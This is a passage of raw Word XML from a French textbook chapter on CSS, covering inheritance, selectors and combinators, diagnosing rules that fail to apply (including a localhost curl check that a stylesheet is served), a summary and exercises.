              </w:rPr>
              <w:t>Le fond ne se répète pas par héritage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois propriétés héritées règlent l'essentiel du texte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body {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: #1f2933;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-family: system-ui, sans-serif;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  line-height: 1.6;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>/* Tous les enfants héritent de ces trois propriétés. Inutile de les répéter.</w:t>
        <w:br/>
        <w:t xml:space="preserve">  */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les valeurs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>inherit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>initial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>unset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permettent de contrôler explicitement ce comportement. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>all: unset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> réinitialise tout, ce qui est utile pour un composant isolé, rarement ailleurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.5 Sélecteurs et combinateurs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un sélecteur peut combiner plusieurs conditions. La lecture se fait de droite à gauche : le navigateur part des éléments candidats, puis remonte leurs ancêtres.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq combinaisons utiles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Descendant : tout p dans article */</w:t>
        <w:br/>
        <w:t>article p { color: #274b6d; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Enfant direct : uniquement les p enfants immédiats */</w:t>
        <w:br/>
        <w:t>article &gt; p { margin-bottom: 1rem; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Frère adjacent : le premier p qui suit un h2 */</w:t>
        <w:br/>
        <w:t>h2 + p { margin-top: 0; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Frère général : tous les p qui suivent un h2 */</w:t>
        <w:br/>
        <w:t>h2 ~ p { color: #1f2933; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Sélecteur d'attribut */</w:t>
        <w:br/>
        <w:t>a[href^="https://"]::after { content: " ↗"; }</w:t>
        <w:br/>
        <w:t>input[type="email"] { border-color: #274b6d; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.32 — Sept sélecteurs et leur coût de calcul</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62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Sélecteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="393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Cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Coût</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3933"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tous les éléments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élevé, à éviter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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.classe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Tous les éléments portant la classe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>[type=email]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3933"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attribut exact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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a:hover</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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État</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>:focus-visible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3933"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Focus clavier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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:nth-child(2n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Éléments pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Moyen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>:has(img)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3933"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Parent contenant une image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Variable, récent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.6 Diagnostiquer une règle qui ne s'applique pas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une règle CSS ne s'applique pas pour quatre raisons : le sélecteur ne cible rien, une règle plus spécifique l'emporte, la propriété est invalide, ou la feuille n'est pas chargée. L'inspecteur répond à ces quatre questions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Vérifier qu'une feuille de style est bien servie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curl -sI http://localhost:8000/css/style.css</w:t>
        <w:br/>
        <w:t>HTTP/1.0 200 OK</w:t>
        <w:br/>
        <w:t>Content-type: text/css</w:t>
        <w:br/>
        <w:br/>
        <w:t># 404 : mauvais chemin. 200 : la feuille est servie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.33 — Cinq symptômes et leur diagnostic</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3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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Cause probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Vérification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucun style du tout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3058"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chemin erroné, 404</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Onglet Réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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Une règle sur deux s'applique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Erreur de syntaxe avant</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Console, feuille source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un style est ignoré</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3058"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Règle plus spécifique</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Styles barrés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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La couleur ne change pas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Variable non définie</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Valeur en rouge dans l'inspecteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rien ne change après modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3058"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cache navigateur</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Rechargement forcé</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LE RITUEL DU DIAGNOSTIC CSS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La feuille est-elle chargée ? (Réseau)</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 sélecteur cible-t-il un élément réel ? (Console : document.querySelector)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Quelle règle gagne ? (Styles, ordre et spécificité)</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La propriété est-elle écrite correctement ? (surlignage de l'inspecteur)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 cache est-il en cause ? (rechargement forcé)</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règle CSS associe un sélecteur à des déclarations.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feuille externe est la seule méthode raisonnable en production.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cascade arbitre : origine, spécificité, ordre.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!important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> signale une organisation défaillante.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Certaines propriétés s'héritent, d'autres non : la distinction évite du code inutile.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combinateurs expriment des relations entre éléments.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Quatre causes expliquent une règle inopérante : cible, conflit, syntaxe, chargement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vous savez écrire une règle. Le chapitre suivant approfondit les sélecteurs et les variables pour construire des feuilles de style maintenables.</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9.1 — Écrire sa première feuille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Reprenez la page du chapitre 3 et ajoutez une feuille de style externe.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Modifiez la couleur du texte, la police et l'interligne du corps.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 xml:space="preserve">Distinguez les titres </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> par la taille et la couleur.</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 xml:space="preserve">Ajoutez une classe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.intro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec une bordure gauche ambre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 9.2 — Résoudre un conflit de spécificité</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 xml:space="preserve">Pourquoi le paragraphe reste-t-il bleu alors que la règle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.alerte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> demande du rouge ?</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#contenu p { color: blue; }</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.alerte { color: red; }</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
